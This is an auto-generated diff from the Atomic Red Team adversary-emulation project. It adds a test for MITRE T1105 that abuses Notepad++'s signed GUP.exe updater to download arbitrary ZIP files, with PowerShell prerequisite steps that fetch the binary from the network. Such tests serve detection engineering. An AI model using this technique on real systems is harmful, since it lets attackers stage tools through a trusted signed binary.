Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -1280,6 +1280,7 @@ command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -858,6 +858,7 @@ command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1770,6 +1770,7 @@
   - Atomic Test #27: Linux Download File and Run [linux]
   - Atomic Test #28: Nimgrab - Transfer Files [windows]
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
+  - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]
   - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1230,6 +1230,7 @@
   - Atomic Test #26: Download a file using wscript [windows]
   - Atomic Test #28: Nimgrab - Transfer Files [windows]
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
+  - Atomic Test #30: Arbitrary file download using the Notepad++ GUP.exe binary [windows]
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
   - Atomic Test #1: Steganographic Tarball Embedding [windows]
   - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]

atomics/Indexes/index.yaml

@@ -74278,6 +74278,47 @@ command-and-control:
           '
         name: command_prompt
         elevation_required: true
+    - name: Arbitrary file download using the Notepad++ GUP.exe binary
+      auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51
+      description: |-
+        GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
+        [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
+        Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_file_url:
+          description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)'
+          type: url
+          default: https://getsamplefiles.com/download/zip/sample-2.zip
+        working_dir:
+          description: The directory where GUP.exe & it's dependecies exists
+          type: path
+          default: PathToAtomicsFolder\T1105\bin\
+        gup_executable:
+          description: GUP is an open source signed binary used by Notepad++ for software
+            updates
+          type: String
+          default: PathToAtomicsFolder\T1105\bin\GUP.exe
+        target_file_sha256:
+          description: SHA256 value of target ZIP file
+          type: string
+          default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
+        prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
+        get_prereq_command: |-
+          New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
+      executor:
+        command: |-
+          mkdir "c:\Temp"
+          cd #{working_dir}
+          GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
+        cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul
+        name: command_prompt
+        elevation_required: true
   T1001.002:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -61286,6 +61286,47 @@ command-and-control:
           '
         name: command_prompt
         elevation_required: true
+    - name: Arbitrary file download using the Notepad++ GUP.exe binary
+      auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51
+      description: |-
+        GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
+        [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
+        Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_file_url:
+          description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)'
+          type: url
+          default: https://getsamplefiles.com/download/zip/sample-2.zip
+        working_dir:
+          description: The directory where GUP.exe & it's dependecies exists
+          type: path
+          default: PathToAtomicsFolder\T1105\bin\
+        gup_executable:
+          description: GUP is an open source signed binary used by Notepad++ for software
+            updates
+          type: String
+          default: PathToAtomicsFolder\T1105\bin\GUP.exe
+        target_file_sha256:
+          description: SHA256 value of target ZIP file
+          type: string
+          default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
+        prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
+        get_prereq_command: |-
+          New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
+      executor:
+        command: |-
+          mkdir "c:\Temp"
+          cd #{working_dir}
+          GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
+        cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul
+        name: command_prompt
+        elevation_required: true
   T1001.002:
     technique:
       x_mitre_platforms:

atomics/T1105/T1105.md

@@ -68,6 +68,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
 
 - [Atomic Test #29 - iwr or Invoke Web-Request download](#atomic-test-29---iwr-or-invoke-web-request-download)
 
+- [Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary](#atomic-test-30---arbitrary-file-download-using-the-notepad-gupexe-binary)
+
 
 <br/>
 
@@ -1369,4 +1371,61 @@ del %temp%\Atomic-license.txt >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary
+GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github.
+[Reference](https://x.com/nas_bench/status/1535322182863179776?s=20)
+Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 66ee226e-64cb-4dae-80e3-5bf5763e4a51
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_file_url | URL of the target ZIP file (Eg: https://example.com/test.zip) | url | https://getsamplefiles.com/download/zip/sample-2.zip|
+| working_dir | The directory where GUP.exe & it's dependecies exists | path | PathToAtomicsFolder&#92;T1105&#92;bin&#92;|
+| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | String | PathToAtomicsFolder&#92;T1105&#92;bin&#92;GUP.exe|
+| target_file_sha256 | SHA256 value of target ZIP file | string | CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+mkdir "c:\Temp"
+cd #{working_dir}
+GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
+```
+
+#### Cleanup Commands:
+```cmd
+rmdir /s /q "C:\Temp\Sample" >nul 2>nul
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
+```
+
+
+
+
 <br/>